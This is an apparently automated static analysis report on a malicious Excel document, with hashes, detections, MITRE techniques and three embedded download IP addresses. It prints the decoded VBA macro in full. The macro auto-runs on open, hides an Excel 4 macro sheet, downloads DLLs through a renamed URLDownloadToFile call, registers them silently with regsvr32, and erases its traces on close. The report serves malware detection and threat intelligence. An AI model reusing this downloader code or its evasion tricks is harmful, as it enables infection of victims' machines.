Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a3fceafde9fb11eb…

MALICIOUS

Office (OLE)

410.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-10-02
MD5: 4d69d9c9746569c34cf25fdb9c846e51 SHA-1: 28cde7d844be78ca178afdb451a17d2e471ba3b6 SHA-256: a3fceafde9fb11eb31295d448041449cbe83be5c4bf694381a8f06820a2d35c1
226 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros that run from the Workbook_Open and Auto_Open events. These macros likely use the URLDownloadToFile API, as indicated by the SC_STR_URLDOWNLOAD heuristic, to fetch a payload from one of the embedded URLs and execute it. The ClamAV detection further confirms its malicious nature, classifying it as Xls.Malware.Valyria-10029771-0.

Heuristics 8

  • ClamAV: Xls.Malware.Valyria-10029771-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10029771-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Sheets("Sheet5").Range("G12") = "..\Xertis2.dll"
    Sheets("Sheet5").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
    Sheets("Sheet5").Range("I18") = "regsvr32 -silent ..\Xertis1.dll"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
        If Not m_openAlreadyRan Then Workbook_Open
    End Sub
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
    On Error Resume Next
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub auto_close()
    On Error Resume Next
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://188.165.62.10/ In document text (OLE body)
    • http://185.82.202.248/ In document text (OLE body)
    • http://84.246.85.241/ In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3979 bytes
SHA-256: 5a93fdb6f254ca5fb402631b6f65405fa671c41dc19a0d9e83d6d2bc3ec0b2be
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean

Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
    If Not m_openAlreadyRan Then Workbook_Open
End Sub

Private Sub asWorkbook_Activateas()
    On Error Resume Next

    If m_isOpenDelayed Then
        m_isOpenDelayed = False
        InitWorkbook
    End If
End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next

    m_openAlreadyRan = True
    Dim objProtectedViewWindow As ProtectedViewWindow
    '
    Set objProtectedViewWindow = Application.ProtectedViewWindows(Me.Name)
    On Error GoTo 0
    '
    m_isOpenDelayed = Not (objProtectedViewWindow Is Nothing)
    If Not m_isOpenDelayed Then InitWorkbook
End Sub

Private Sub ssaaInitWorkbookssaa()
    On Error Resume Next

    If VBA.Val(Application.Version) < 12 Then
        MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing"
        Me.Close False
        Exit Sub
    End If
    '
        'Other code
        '
        '
        '
End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub auto_open()
On Error Resume Next
Drezden = "="
Application.ScreenUpdating = False
Gert
Sheets("Sheet5").Visible = False
Sheets("Sheet5").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheet5").Range("H24") = UserForm1.Label1.Caption
Sheets("Sheet5").Range("H25") = UserForm1.Label3.Caption
Sheets("Sheet5").Range("H26") = UserForm1.Label4.Caption

Sheets("Sheet5").Range("K17") = "=NOW()"
Sheets("Sheet5").Range("K18") = ".dat"
Sheets("Sheet5").Range("K18") = ".dat"


Sheets("Sheet5").Range("H35") = "=HALT()"
Sheets("Sheet5").Range("I9") = UserForm1.Label2.Caption
Sheets("Sheet5").Range("I10") = UserForm1.Caption
Sheets("Sheet5").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet5").Range("I12") = "Byukilos"
Sheets("Sheet5").Range("G10") = "..\Xertis.dll"
Sheets("Sheet5").Range("G11") = "..\Xertis1.dll"
Sheets("Sheet5").Range("G12") = "..\Xertis2.dll"
Sheets("Sheet5").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
Sheets("Sheet5").Range("I18") = "regsvr32 -silent ..\Xertis1.dll"
Sheets("Sheet5").Range("I19") = "regsvr32 -silent ..\Xertis2.dll"
Sheets("Sheet5").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet5").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet5").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet5").Range("H9") = Drezden & "REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet5").Range("H17") = Drezden & "EXEC(I17)"
Sheets("Sheet5").Range("H18") = Drezden & "EXEC(I18)"
Sheets("Sheet5").Range("H19") = Drezden & "EXEC(I19)"


Application.Run Sheets("Sheet5").Range("H1")

End Sub

Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheet5").Delete
   Application.DisplayAlerts = True
End Sub

Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet5"
End Function

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C41A3DA9-9E4E-4E34-AE8A-E46E95CD3254}{C8DFB01A-A872-44D6-88E7-C94D7F4BB6E3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False